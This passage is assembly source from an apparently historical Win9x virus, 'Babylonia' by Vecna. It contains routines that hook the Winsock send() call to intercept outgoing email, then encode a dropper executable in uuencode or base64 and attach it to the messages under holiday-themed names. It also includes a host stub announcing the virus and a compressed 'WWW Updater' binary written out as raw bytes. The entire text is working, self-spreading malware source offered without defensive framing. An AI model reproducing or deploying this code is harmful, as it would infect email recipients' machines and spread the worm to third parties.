dropname db 'C:\GOAT.EXE', 0 ELSE dropname db 'C:\BABYLONIA.EXE', 0 ENDIF myname dd 0 mem_temp dd 0 mem dd 0 sent dd 0 uudropper dd 0 uusize dd 0 b64dropper dd 0 b64size dd 0 my_send proc call init pusha call delta mov esi, [esp+(8*4)+(1*4)+4] ;send() buffer db 0b9h socket_out dd 0 ;we're monitoring a specific socket? jecxz @@all cmp [esp+(8*4)+(1*4)+0], ecx ;if so, then make sure is our je @@monitor jmp @@done @@all: cmp [esi], 'ATAD' ;email is being send! jne @@done mov eax, [esp+(8*4)+(1*4)+0] ;monitor this socket only now mov [ebp+(ofs socket_out-ofs vcode)], eax sub eax, eax mov [ebp+(ofs boundary-ofs vcode)], eax ;init MIME fieldz mov [ebp+(ofs sent-ofs vcode)], eax jmp @@done @@monitor: mov ecx, [esp+(8*4)+(1*4)+8] ;size mov edi, esi mov al, '.' ;search . push ecx @@cont_dot: repne scasb ;not end_of_email yet jne @@no_dot ;so, check for MIME cmp dwo [edi-2], 0a0d2e0ah jne @@cont_dot ;make sure is the end_of_email sign pop ecx ;ecx=size of buffer call uu_send sub eax, eax ;ready to infect next email mov [ebp+(ofs socket_out-ofs vcode)], eax jmp @@done ;send the . @@no_dot: pop ecx dec ecx ;monitor MIME emailz dec ecx dec ecx ;size-3, since we load DWORDs test ecx, ecx js @@done ;buffer smaller than 2, exit! @@scan: push ecx lodsd dec esi dec esi dec esi push esi and eax, not 20202020h ;eax=upcase of 1st 4 letterz db 0bah boundary dd 0 test edx, edx ;we already found the boundary? jnz @@boundary_found sub eax, 'NUOB' jnz @@bogus ;maybe a boundary? lea edi, [ebp+(ofs bound_-ofs vcode)] @@loop_1: cmp by [edi], ah je @@done_1 lodsb cmp al, 'a' jb @@up cmp al, 'z' ;check string ja @@up and al, not 20h @@up: inc edi not al cmp by [edi-1], al je @@loop_1 @@done_1: jne @@bogus mov edi, [ebp+(ofs mem-ofs vcode)] ;copy MIME boundary to buffer mov [ebp+(ofs boundary-ofs vcode)], edi @@next_b: lodsb cmp al, '"' je @@copied stosb jmp @@next_b @@copied: sub eax, eax ;now we have all we need for stosd ;a perfect send :) jmp @@bogus @@boundary_found: push esi dec esi dec ecx sub eax, eax ;search for boundary @@match: lodsb inc edx cmp by [edx], ah je @@is_boundary cmp by [edx], al ;compare stringz je @@match @@is_boundary: xchg edi, esi ;edi=end of boundary+1 pop esi jne @@bogus ;end reached and all match? cmp al, '-' jne @@bogus scasb ;found last boundary! jne @@bogus pop eax ;fix stack mov [esp], edi mov wo [edi-2], 0A0Dh ;turn to normal boundary sub edi, [esp+(8*4)+(1*4)+4+4] ;subtract buffer address xchg [esp+(8*4)+(1*4)+8+4], edi ;new size mov [ebp+(ofs eax_value2-ofs vcode)], edi ;save old for return push dwo [esp+(8*4)+(1*4)+8+4] ;size push dwo [esp+(8*4)+(1*4)+8+4] ;buffer call safesend pop edi ;interception point mov wo [edi-2], '--' ;restore user buffer mov [ebp+(ofs eax_value2-ofs vcode)], eax jc @@error call uu_send mov eax, [ebp+(ofs eax_value2-ofs vcode)] ;how much they want send mov ebx, [esp+(8*4)+(1*4)+8] ;how much we already send sub eax, ebx jz @@gran_finale ;done mov [esp+(8*4)+(1*4)+8], eax ;send rest add [esp+(8*4)+(1*4)+4], ebx ;starting from last send byte push dwo [esp+(8*4)+(1*4)+8] ;size push dwo [esp+(8*4)+(1*4)+8] ;buffer call safesend ;send the remainder of user buffer jc @@error @@gran_finale: mov edi, [ebp+(ofs boundary-ofs vcode)] mov esi, edi @@next1: lodsb test al, al jnz @@next1 ;search end xchg edi, esi dec edi add al, '-' stosb ;make last boundary stosb sub edi, esi ;calculate the size push edi ;size push esi call safesend ;send last boundary @@error: popa db 0b8h eax_value2 dd 0 ;return no error ret 4*4 @@bogus: pop esi pop ecx dec ecx jnz @@scan ;bahh... to far to a loop @@done: popa mov eax, 12345678h oldsend equ dwo $-4 jmp eax my_send endp script db 'Content-Type: application/octet-stream; name="', 1, '"', 13, 10 db 'Content-Disposition: attachment; filename="', 1, '"', 13, 10 db 'Content-Transfer-Encoding: base64', 13, 10, 13, 10 db 0 script_sz = $-ofs script uu_send proc pusha sub eax, eax cmp [ebp+(ofs sent-ofs vcode)], eax jne @@already mov edi, [ebp+(ofs boundary-ofs vcode)] cmp edi, eax je @@skip_header add edi, 100h ;work after boundary push edi lea esi, [ebp+(ofs script-ofs vcode)] @@expand: lodsb not al test al, al jz @@send_header cmp al, 1 jnz @@name call ninsert ;insert exe name db 0b0h @@name: stosb jmp @@expand @@send_header: pop esi sub edi, esi push edi ;size push esi ;buffer call safesend ;send mime header jc @@fuxkx mov edi, [ebp+(ofs b64size-ofs vcode)] mov esi, [ebp+(ofs b64dropper-ofs vcode)] jmp @@block @@skip_header: mov edi, [ebp+(ofs uusize-ofs vcode)] mov esi, [ebp+(ofs uudropper-ofs vcode)] @@block: mov eax, 4*1024 ;block size=4kb cmp eax, edi jb @@low mov eax, edi ;send the remainder @@low: push eax ;size push esi ;buffer call safesend jc @@fuxkx add esi, eax sub edi, eax jnz @@block ;blockz left? @@fuxkx: mov [ebp+(ofs sent-ofs vcode)], ebp @@already: popa ret uu_send endp init proc pusha cld sub eax, eax call delta cmp [ebp+(ofs mem-ofs vcode)], eax jne @@inited ;we already inited our dropper? mov eax, [ebp+(ofs mem_temp-ofs vcode)] mov [ebp+(ofs mem-ofs vcode)], eax test eax, eax jz @@inited push eax call @@over include dropper.inc @@over: call _aP_depack_asm ;unpack dropper data add esp, -8*2 push esp db 0b8h _gsystime dd 0 call eax mov bl, [esp+(1*2)] ;bh=month add esp, 8*2 push 6 lea esi, [ebp+(ofs dates-ofs vcode)] lea ecx, [ebp+(ofs name0-ofs vcode)] mov [ebp+(ofs myname-ofs vcode)], ecx pop ecx @@next_date: lodsw cmp ah, bl je @@is cmp bl, al jne @@nope ;this holiday isnt this month @@is: pusha mov edi, [ebp+(ofs mem-ofs vcode)] add edi, icon ;where icon should go in dropper mov esi, edi add esi, (ofs coelho-icon) ;first icon mov eax, 1152 xchg eax, ecx ;eax=count ecx=size icon dec eax lea edx, [ebp+(ofs names-ofs vcode)] mov edx, [edx+(eax*4)] add edx, ebp mov [ebp+(ofs myname-ofs vcode)], edx ;get dropper name cdq mul ecx ;count*size+base=new icon add esi, eax rep movsb ;install new icon popa @@nope: loop @@next_date ;check next date push 2 lea esi, [ebp+(ofs dropname-ofs vcode)] pop ecx call r3_open jz @@fux0r push DROPPER_SIZE mov esi, [ebp+(ofs mem-ofs vcode)] pop ecx call r3_write ;write clean dropper call r3_close push 3 lea esi, [ebp+(ofs dropname-ofs vcode)] pop ecx call r3_open jz @@fux0r1 call r3_seof ;get new dropper size cmp eax, DROPPER_SIZE je @@fux0r2 ;was infected? push eax call r3_ssof mov edi, [ebp+(ofs mem-ofs vcode)] mov ecx, [esp] lea eax, [edi+ecx] push edi push eax call r3_read ;read infected dropper @@fux0r2: call r3_close @@fux0r1: lea eax, [ebp+(ofs dropname-ofs vcode)] push eax db 0b8h _fdelete dd 0 call eax pop edi ;edi=uuencode buffer mov esi, [esp] ;esi=image mov ecx, [esp+4] ;ecx=size call uuencode call delta mov [ebp+(ofs uudropper-ofs vcode)], edi mov [ebp+(ofs uusize-ofs vcode)], ecx pop esi ;esi=image lea edi, [edi+ecx] pop eax ;eax=size call BASE64 mov [ebp+(ofs b64dropper-ofs vcode)], edi mov [ebp+(ofs b64size-ofs vcode)], ecx lea eax, [ebp+(ofs wsock-ofs vcode)] push eax db 0b8h _getmhandle dd 0 call eax mov edi, [ebp+(ofs _getproc-ofs vcode)] ;eax=wsokc32 base call @@112 db 'WSAGetLastError', 0 @@112: push eax call edi mov [ebp+(ofs _WSAGetLastError-ofs vcode)], eax jmp @@inited @@fux0r: sub eax, eax mov [ebp+(ofs mem-ofs vcode)], eax @@inited: popa ret init endp decript_names proc pusha call delta lea edi, [ebp+(ofs name0-ofs vcode)] push name_sz pop ecx mov esi, edi @@999: lodsb not al ;crypt/decrypt stosb loop @@999 popa ret decript_names endp ninsert proc pusha call decript_names mov esi, [ebp+(ofs myname-ofs vcode)] @@next: lodsb stosb test al, al jnz @@next dec edi mov eax, not 'EXE.' not eax stosd mov [esp], edi call decript_names popa ret ninsert endp dates equ this byte db 06, 07 ; BABILONIA - US FLAG db 12, 12 ; NAVIDAD - Papai Noel db 04, 04 ; PASCOA - Ovo db 01, 01 ; REYES MAGOS - Jesus db 10, 11 ; HALLOWEN - Abobora db 03, 03 ; PASCOA2 - Coelho name0 db 'I-WATCH-U', 0 ;default name name1 db 'BABILONIA', 0 name2 db 'X-MAS', 0 name3 db 'SURPRISE!', 0 name4 db 'JESUS', 0 name5 db 'BUHH', 0 name6 db 'CHOCOLATE', 0 name_sz = $-ofs name0 names equ this byte dd (ofs name6-ofs vcode) dd (ofs name5-ofs vcode) dd (ofs name4-ofs vcode) dd (ofs name3-ofs vcode) dd (ofs name2-ofs vcode) dd (ofs name1-ofs vcode) dd 0 r3_open proc sub eax, eax push eax push 22h push ecx push eax push eax push 0c0000000h push esi mov eax, 12345678h _openfile equ dwo $-4 call eax ;CreateFileA mov [ebp+(ofs r3handle-ofs vcode)], eax inc eax ret r3_open endp r3_close proc push 12345678h org $-4 r3handle dd 0 mov eax, 12345678h _closehandle equ dwo $-4 call eax ;CloseHandle ret r3_close endp r3_write proc push 0 call @@1 dd 0 @@1: push ecx push esi push dwo [ebp+(ofs r3handle-ofs vcode)] mov eax, 12345678h _writefile equ dwo $-4 call eax ;WriteFile ret r3_write endp r3_read proc push 0 call @@1 dd 0 @@1: push ecx push edi push dwo [ebp+(ofs r3handle-ofs vcode)] mov eax, 12345678h _readfile equ dwo $-4 call eax ;WriteFile ret r3_read endp r3_ssof proc push 0 db 66h,0b8h r3_seof proc push 2 push 0 push 0 push dwo [ebp+(ofs r3handle-ofs vcode)] mov eax, 12345678h _seekfile equ dwo $-4 call eax ret r3_seof endp r3_ssof endp ;UUENCODE ;ESI=Data to encode ;EDI=Buffer ;ECX=Size of data uuencode proc cld push edi push esi push ecx mov eax, 065620A0Dh stosw stosd mov eax, not ' nig' not eax stosd mov eax, not ' 446' not eax stosd call ninsert ;insert dropper name mov ax, 0A0Dh stosw mov eax, [esp] ;eax=size cdq push 45 pop ebx div ebx ;dl=rest in last line mov ecx, eax ;ecx=number of lines pop ebp ;esi=start of data pop esi add ebp, esi ;ebp=end of data @@line: push ecx mov al, "M" ;start of line stosb push 15 pop ecx ;read 15*3 => write 15*4 @@octet: call getbyte shr al, 2 call convert ;1st char shl al, 4 and al, 00110000b mov bh, al call getbyte shr al, 4 and al, 00001111b or al, bh call convert ;2nd char shl al, 2 and al, 11111100b mov bh, al call getbyte shr al, 6 and al, 00000011b or al, bh call convert ;3th char call convert ;4th char loop @@octet mov ax, 0A0Dh stosw pop ecx loop @@line ;do next line mov eax, edx test al, al jz @@end add al, 20h ;do remainder stosb xor eax, eax mov al, dl xor edx, edx xor ecx, ecx push 3 pop ebx div ebx mov ecx, eax test edx, edx jz @@no_rest inc cx ;octets to make @@no_rest: push 1 ;is last line sub edx, edx ;with no rest jmp @@octet @@end: mov eax, 0650A0D60h ;"end" stosd mov eax, 00A0D646Eh stosd shr eax, 16 ;cr+lf stosw pop ecx sub edi, ecx xchg edi, ecx ret uuencode endp wsock db 'WSOCK32.DLL', 0 convert proc and al, 00111111b jnz @@0 add al, 40h @@0: add al, 20h stosb mov al, ah ret convert endp getbyte proc cmp esi, ebp ;end of buffer? jne @@load xor al, al db 0b4h ;skip LODSB @@load: lodsb mov ah, al ;backup ret getbyte endp protect proc inc ecx add ecx, 4096 ;tnz again to z0mbie! shr ecx, 12 test ebx, 4095 jnz @@forget shr ebx, 12 push 0 push not (00020000h+00040000h) ;not writeable+user push ecx push ebx push 00010133h ;PageModifyPermissions call vxd add esp, 4*4 @@forget: ret protect endp safesend proc pusha @@retry: mov eax, [esp+4+(8*4)] mov ecx, [esp+8+(8*4)] push 0 push ecx ;size push eax ;buffer push dwo [ebp+(ofs socket_out-ofs vcode)] call [ebp+(ofs oldsend-ofs vcode)] mov ecx, eax inc ecx jnz @@done db 0b8h _WSAGetLastError dd 0 call eax sub eax, 10035 ;EWOULDBLOCK? jz @@retry stc ;error db 0b1h @@done: clc mov [esp+(7*4)], eax popa ret 2*4 safesend endp ;esi=input ;edi=output ;eax=size BASE64 proc cld push edi push 3 call @@trans trans_table = $ db 'A','B','C','D','E','F','G','H','I','J' db 'K','L','M','N','O','P','Q','R','S','T' db 'U','V','W','X','Y','Z','a','b','c','d' db 'e','f','g','h','i','j','k','l','m','n' db 'o','p','q','r','s','t','u','v','w','x' db 'y','z','0','1','2','3','4','5','6','7' db '8','9','+','/' chars dd ? ;contador de caracteres @@trans: pop ebx push (ofs chars-ofs trans_table) pop ecx @@1: not by [ebx+ecx-1] ;crazy, isnt? ;) loop @@1 ;now, imagine what i can do if i wasnt stoned all time pop ecx cdq mov dwo [ebx+ecx+((ofs chars-ofs trans_table)-3)], edx ;tricky ;) div ecx mov ecx, eax push edx @@loop: lodsd dec esi ;edx=original mov edx, eax ;edx=work copy call Temp call CODE64Block3 call CODE64Block4 loop @@loop pop ecx ;get rest jecxz @@done lodsd dec ecx jz @@rest1 movzx edx, ax ;use only 2 bytes call Temp call CODE64Block3 jmp @@end @@rest1: movzx edx, al ;use 1 byte only call Temp inc ecx inc ecx @@end: mov al, '=' rep stosb @@done: mov eax, 0A0D0A0Dh stosd push (ofs chars-ofs trans_table) pop ecx @@2: not by [ebx+ecx-1] loop @@2 pop ecx sub edi, ecx ;edi=buffer xchg ecx, edi ;ecx=size ret BASE64 endp Temp proc call CODE64Block1 ;little optimizing routine call CODE64Block2 ret Temp endp CODE64Block1: mov eax, edx shr eax, 02h process3: jmp process CODE64Block2: mov eax, edx shl al, 04h shr ah, 04h process2: or al, ah ;chained jmps jmp process3 ;another "why make it easy?" (c) Vecna ;) CODE64Block3: mov eax, edx shr eax, 08h shl al, 02h shr ah, 06h jmp process2 CODE64Block4: mov eax,edx shr eax,10h process: and al,00111111b xlatb stosb mov eax, dwo [ebx+(ofs chars-ofs trans_table)] inc eax mov dwo [ebx+(ofs chars-ofs trans_table)], eax pusha push 0000004Ch pop ecx cdq div ecx test edx, edx popa jnz @@noline mov ax, 0A0Dh stosw @@noline: ret align 4 vend equ this byte db 'EOV', 0 _VIRUS ends end main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BABYLON.ASM]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOST.INC]ÄÄÄ _TEXT segment dword use32 public 'CODE' main proc call init001 push 0 push ofs caption push ofs msg push 0 temp1 equ $ call virusmain extrn MessageBoxA:PROC call MessageBoxA push 0 extrn ExitProcess:PROC call ExitProcess main endp init001 proc mov esi, ofs hlp1_s mov edi, esi mov ecx, hlp1_sz @@1: lodsb not al stosb loop @@1 mov esi, ofs bound_ mov edi, esi mov ecx, bound_sz @@2: lodsb not al stosb loop @@2 mov esi, ofs script mov edi, esi mov ecx, script_sz @@3: lodsb not al stosb loop @@3 mov esi, ofs name0 mov edi, esi mov ecx, name_sz @@4: lodsb not al stosb loop @@4 mov esi, ofs trans_table mov edi, esi mov ecx, (ofs chars-ofs trans_table) @@5: lodsb not al stosb loop @@5 ret init001 endp _TEXT ends _DATA segment dword use32 public 'DATA' IF DEBUG EQ TRUE caption db 'Vecna virus (DEBUG)', 0 ELSE caption db 'Vecna virus', 0 ENDIF msg db 'You just released a Win9x virus!', 0 _DATA ends ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOST.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[UPDATER.INC]ÄÄÄ ;Compressed WWW Updater ;(C) Vecna db 04Dh, 038h, 05Ah, 090h, 038h, 003h, 066h, 002h db 004h, 009h, 071h, 0FFh, 081h, 0B8h, 0C2h, 091h db 001h, 040h, 0C2h, 015h, 0C6h, 080h, 009h, 00Eh db 0B4h, 04Ch, 0CDh, 021h, 015h, 001h, 0EBh, 018h db 050h, 045h, 008h, 04Ch, 001h, 053h, 003h, 014h db 0CEh, 0E0h, 003h, 00Fh, 001h, 00Bh, 096h, 013h db 065h, 008h, 009h, 006h, 032h, 015h, 010h, 09Ch db 022h, 052h, 040h, 010h, 020h, 002h, 057h, 001h db 051h, 08Ah, 040h, 018h, 04Eh, 015h, 007h, 0D9h db 053h, 020h, 04Dh, 008h, 0EEh, 095h, 04Bh, 095h db 030h, 011h, 0E5h, 06Bh, 001h, 0A0h, 043h, 04Fh db 044h, 052h, 045h, 08Dh, 0DDh, 02Bh, 0ECh, 095h db 002h, 024h, 0A5h, 041h, 0B7h, 040h, 044h, 041h db 054h, 0CAh, 0B9h, 028h, 020h, 04Ch, 024h, 00Ah db 0A5h, 0F3h, 060h, 0C0h, 02Eh, 069h, 064h, 039h db 061h, 074h, 053h, 028h, 024h, 030h, 0D1h, 0E5h db 00Ch, 02Ah, 028h, 052h, 088h, 0A0h, 0FCh, 068h db 003h, 040h, 080h, 0E8h, 032h, 0A6h, 005h, 00Bh db 002h, 020h, 02Bh, 0C0h, 050h, 06Ah, 073h, 001h db 0E8h, 068h, 031h, 080h, 021h, 05Ch, 0E8h, 0EAh db 043h, 016h, 035h, 07Ah, 095h, 044h, 065h, 080h db 00Ch, 0FAh, 0FFh, 074h, 059h, 00Ah, 0FEh, 0EAh db 048h, 009h, 0C7h, 005h, 04Ch, 021h, 0B0h, 021h db 068h, 05Bh, 060h, 010h, 012h, 064h, 067h, 0FFh db 036h, 0E1h, 088h, 00Dh, 089h, 026h, 03Ah, 014h db 025h, 050h, 03Ah, 032h, 03Ah, 06Bh, 08Bh, 0ACh db 00Bh, 02Eh, 08Fh, 040h, 006h, 058h, 028h, 083h db 03Dh, 033h, 0C1h, 082h, 018h, 068h, 060h, 0EAh db 098h, 0A1h, 04Eh, 0B5h, 0EBh, 0C2h, 070h, 06Ah db 0A4h, 068h, 06Dh, 0FEh, 05Dh, 018h, 0DDh, 02Dh db 08Fh, 02Bh, 081h, 0ECh, 08Dh, 001h, 077h, 0D9h db 068h, 0A9h, 00Fh, 01Eh, 091h, 0DAh, 003h, 085h db 0C0h, 00Fh, 084h, 0B2h, 028h, 0E1h, 005h, 012h db 006h, 08Bh, 0F8h, 0BEh, 0C8h, 020h, 00Eh, 031h db 0B9h, 00Eh, 023h, 0F3h, 0A4h, 094h, 073h, 0DCh db 022h, 0C8h, 090h, 0AAh, 039h, 00Ah, 055h, 050h db 0E8h, 0C2h, 014h, 064h, 07Ch, 04Ah, 0BEh, 036h db 08Eh, 0FDh, 0BAh, 04Ch, 0FFh, 002h, 047h, 003h db 0ACh, 084h, 0C0h, 074h, 06Fh, 038h, 0BDh, 00Ah db 08Bh, 0F5h, 07Fh, 061h, 055h, 0E8h, 08Ah, 050h db 02Ch, 074h, 054h, 02Bh, 01Bh, 0EDh, 068h, 07Ch db 023h, 0AAh, 078h, 08Fh, 016h, 069h, 03Fh, 08Dh db 087h, 00Ch, 0BFh, 002h, 037h, 025h, 0D9h, 0D4h db 002h, 002h, 080h, 0E8h, 0E6h, 0A0h, 028h, 075h db 025h, 06Ah, 00Ch, 034h, 068h, 0C9h, 02Bh, 082h db 029h, 055h, 0A2h, 008h, 0FFh, 035h, 08Ah, 031h db 072h, 0A9h, 00Bh, 091h, 0C3h, 018h, 0BAh, 0FEh db 0DDh, 0EBh, 005h, 0EFh, 0BCh, 00Dh, 094h, 081h db 0C4h, 096h, 083h, 0C3h, 080h, 03Dh, 049h, 09Ah db 038h, 014h, 00Fh, 085h, 00Eh, 014h, 0FEh, 005h db 00Dh, 050h, 0F0h, 090h, 089h, 054h, 0EFh, 0AEh db 00Dh, 036h, 0E8h, 062h, 06Fh, 056h, 045h, 090h db 057h, 0BAh, 034h, 0D8h, 042h, 06Ah, 040h, 068h db 041h, 0CEh, 010h, 0B4h, 0FEh, 0FAh, 08Ch, 022h db 01Dh, 0C6h, 043h, 0A3h, 05Ch, 0C4h, 0A6h, 0DAh db 045h, 0B3h, 0A8h, 0E0h, 00Eh, 0D4h, 03Eh, 0A3h db 08Ch, 011h, 00Bh, 0E8h, 061h, 013h, 07Bh, 00Fh db 082h, 088h, 088h, 037h, 08Bh, 03Dh, 041h, 003h db 0F8h, 089h, 0E1h, 054h, 048h, 093h, 036h, 0A9h db 0C2h, 073h, 0C4h, 060h, 057h, 0AAh, 0F3h, 0B1h db 02Ch, 0E7h, 080h, 04Dh, 072h, 05Dh, 081h, 039h db 056h, 04Dh, 098h, 08Dh, 00Ah, 075h, 055h, 083h db 079h, 096h, 01Eh, 077h, 043h, 00Fh, 0B7h, 041h db 008h, 0D3h, 0E0h, 0B7h, 0D0h, 0F8h, 007h, 075h db 043h, 000h, 08Bh, 079h, 014h, 003h, 0F9h, 068h db 052h, 012h, 091h, 0E2h, 051h, 060h, 015h, 019h db 0FCh, 0F6h, 068h, 016h, 00Ch, 042h, 06Ch, 026h db 0D7h, 013h, 0CAh, 0ECh, 049h, 004h, 0F7h, 060h db 038h, 061h, 028h, 0EBh, 086h, 09Dh, 070h, 0C0h db 0ACh, 0C1h, 016h, 057h, 0E8h, 063h, 05Dh, 0E9h db 059h, 08Eh, 00Bh, 0C6h, 04Dh, 0FDh, 020h, 012h db 060h, 01Ch, 08Bh, 044h, 024h, 07Ah, 03Ah, 04Ch db 028h, 028h, 0DDh, 032h, 051h, 050h, 098h, 058h db 023h, 0E8h, 04Ah, 003h, 041h, 08Bh, 0C8h, 041h db 075h, 00Eh, 0D7h, 0FCh, 015h, 02Dh, 030h, 033h db 027h, 00Ah, 074h, 0D8h, 0F9h, 051h, 0B1h, 0C9h db 085h, 056h, 01Ch, 061h, 0C2h, 085h, 028h, 02Eh db 034h, 021h, 01Ch, 064h, 024h, 03Eh, 02Ah, 06Ah db 0B2h, 0E8h, 002h, 071h, 0E8h, 092h, 006h, 051h db 0A3h, 032h, 0CAh, 041h, 040h, 0F9h, 016h, 02Fh db 0A0h, 09Ch, 0D2h, 0A9h, 024h, 014h, 015h, 0E1h db 041h, 050h, 08Bh, 0F4h, 0F8h, 010h, 056h, 0A6h db 052h, 061h, 0E2h, 023h, 083h, 0ECh, 0F0h, 022h db 089h, 073h, 088h, 08Bh, 07Ch, 028h, 024h, 02Ch db 0C5h, 042h, 010h, 012h, 080h, 002h, 062h, 0A0h db 0A9h, 020h, 0B8h, 047h, 045h, 054h, 00Ah, 020h db 0ABh, 08Bh, 074h, 08Dh, 00Ch, 0E8h, 0AFh, 01Fh db 0BEh, 048h, 053h, 058h, 088h, 0A5h, 0B7h, 027h db 01Fh, 028h, 09Ch, 086h, 0B8h, 00Dh, 00Ah, 004h db 031h, 0ABh, 02Bh, 07Fh, 057h, 0FFh, 08Fh, 028h db 030h, 0E8h, 0D2h, 041h, 023h, 072h, 071h, 08Bh db 05Ch, 04Ch, 04Fh, 053h, 098h, 0F6h, 0A0h, 011h db 060h, 003h, 04Dh, 0D8h, 059h, 030h, 0EDh, 06Dh db 02Ch, 02Bh, 0DEh, 060h, 089h, 03Ah, 01Ch, 081h db 03Eh, 048h, 071h, 054h, 03Ah, 050h, 075h, 080h db 0B9h, 043h, 06Fh, 06Eh, 074h, 087h, 0D9h, 01Fh db 0ACh, 03Ah, 0C3h, 003h, 017h, 039h, 05Eh, 0FFh db 0A8h, 012h, 081h, 07Eh, 033h, 003h, 065h, 024h db 02Dh, 0F3h, 009h, 007h, 012h, 007h, 054h, 079h db 070h, 0CFh, 067h, 004h, 0E2h, 011h, 0E3h, 021h db 046h, 094h, 01Ch, 0FCh, 069h, 00Ch, 075h, 0F6h db 089h, 086h, 018h, 0AEh, 0C3h, 0FFh, 04Ah, 0EDh db 00Ah, 0F8h, 0EBh, 011h, 013h, 062h, 0FAh, 001h db 039h, 0F9h, 021h, 016h, 071h, 01Eh, 062h, 00Bh db 004h, 003h, 0AAh, 0EBh, 0F8h, 0C1h, 099h, 03Eh db 02Eh, 0E5h, 016h, 084h, 00Ah, 041h, 072h, 00Fh db 002h, 07Ah, 077h, 00Ah, 001h, 05Ah, 076h, 007h db 000h, 061h, 073h, 002h, 012h, 0F8h, 0B0h, 0F9h db 042h, 0A4h, 0F1h, 0E8h, 0DBh, 090h, 0A5h, 003h db 046h, 013h, 0EBh, 0F6h, 0BFh, 023h, 03Fh, 0A1h db 084h, 04Eh, 0ABh, 0CAh, 004h, 006h, 006h, 04Fh db 0E8h, 0BFh, 039h, 010h, 073h, 003h, 0A4h, 05Ch db 03Ch, 07Eh, 0A0h, 07Eh, 03Bh, 035h, 044h, 054h db 061h, 049h, 0C3h, 071h, 04Ch, 011h, 014h, 015h db 064h, 077h, 04Ah, 04Fh, 0C5h, 08Bh, 041h, 024h db 008h, 0EBh, 01Dh, 036h, 04Ah, 083h, 06Ah, 0F0h db 058h, 0F8h, 003h, 040h, 028h, 073h, 08Bh, 005h db 008h, 081h, 048h, 020h, 080h, 013h, 09Ah, 029h db 035h, 0B0h, 074h, 036h, 002h, 08Bh, 00Dh, 060h db 044h, 075h, 0E3h, 06Bh, 0FFh, 0D1h, 037h, 0A3h db 048h, 013h, 041h, 074h, 066h, 0C7h, 063h, 0FDh db 02Eh, 028h, 018h, 052h, 08Ah, 0D2h, 018h, 032h db 0C2h, 070h, 0C6h, 00Fh, 031h, 074h, 047h, 0FCh db 0BFh, 0A4h, 081h, 017h, 0F2h, 0AEh, 0FDh, 0B0h db 05Ch, 080h, 00Ah, 0FCh, 08Bh, 047h, 002h, 00Dh db 020h, 0C1h, 003h, 03Dh, 072h, 06Eh, 061h, 0C4h db 074h, 013h, 0A7h, 033h, 0BFh, 0C4h, 0EBh, 052h db 0CBh, 00Eh, 048h, 0AEh, 0D6h, 00Ah, 07Ah, 0FCh db 0C4h, 01Eh, 0C3h, 0D4h, 05Ch, 006h, 04Ch, 09Bh db 011h, 0D1h, 020h, 058h, 0DAh, 0C6h, 0E8h, 082h db 03Bh, 0A4h, 011h, 011h, 02Eh, 068h, 0D6h, 03Bh db 050h, 02Ah, 0FEh, 006h, 043h, 0EFh, 010h, 01Dh db 021h, 088h, 00Ch, 064h, 02Ch, 020h, 0BFh, 0C3h db 015h, 0C5h, 0C1h, 0D7h, 0A3h, 015h, 0F5h, 007h db 023h, 068h, 011h, 06Ch, 088h, 070h, 0C4h, 074h db 062h, 044h, 029h, 013h, 05Eh, 0D8h, 025h, 0E0h db 030h, 0DDh, 023h, 095h, 0E4h, 006h, 021h, 0E8h db 090h, 0ECh, 0C8h, 0F0h, 064h, 0F4h, 032h, 0F8h db 019h, 0FCh, 00Dh, 0C1h, 031h, 008h, 004h, 086h db 043h, 008h, 021h, 00Ch, 090h, 010h, 0C8h, 014h db 064h, 018h, 032h, 020h, 019h, 024h, 00Ch, 028h db 086h, 043h, 02Ch, 021h, 030h, 090h, 034h, 0C8h db 038h, 064h, 03Ch, 032h, 044h, 019h, 04Ch, 00Ch db 050h, 086h, 045h, 054h, 05Eh, 001h, 0FBh, 0C1h db 02Fh, 076h, 065h, 063h, 061h, 021h, 082h, 00Ch db 069h, 072h, 075h, 073h, 0E1h, 004h, 078h, 0CBh db 087h, 060h, 06Fh, 06Bh, 034h, 065h, 0DFh, 02Ah db 0FEh, 0AEh, 07Ah, 079h, 03Ch, 075h, 0C5h, 007h db 06Ah, 070h, 0C7h, 0A5h, 0B0h, 066h, 074h, 077h db 061h, 07Fh, 072h, 00Eh, 05Ch, 04Dh, 069h, 063h db 0DFh, 01Bh, 073h, 01Dh, 0D3h, 057h, 0D1h, 06Eh db 064h, 0E9h, 077h, 0EFh, 0C0h, 043h, 075h, 072h db 0D7h, 030h, 00Dh, 090h, 056h, 062h, 0F1h, 069h db 007h, 0F7h, 052h, 0FFh, 097h, 017h, 01Ch, 020h db 0BAh, 02Fh, 031h, 02Eh, 0E5h, 070h, 08Fh, 055h db 061h, 073h, 030h, 02Dh, 041h, 067h, 080h, 043h db 03Ah, 020h, 04Dh, 06Fh, 07Ah, 069h, 071h, 06Ch db 0C3h, 0D6h, 034h, 02Eh, 030h, 0E1h, 028h, 063h db 0F4h, 06Dh, 070h, 0B0h, 096h, 007h, 069h, 062h db 06Ch, 065h, 03Bh, 0D5h, 056h, 023h, 082h, 029h db 0BEh, 05Ch, 078h, 041h, 0F3h, 0FDh, 070h, 08Fh db 055h, 069h, 06Dh, 0F9h, 066h, 02Fh, 0CFh, 0B9h db 066h, 02Ch, 04Ch, 00Bh, 078h, 072h, 02Dh, 07Eh db 062h, 040h, 074h, 070h, 0ACh, 011h, 0A3h, 094h db 0A7h, 06Ch, 018h, 02Ah, 0F1h, 0CBh, 028h, 06Ah db 048h, 090h, 0DCh, 067h, 001h, 05Ch, 04Bh, 045h db 052h, 04Eh, 0CCh, 04Ch, 033h, 03Ch, 032h, 02Eh db 03Dh, 058h, 070h, 051h, 043h, 094h, 0B9h, 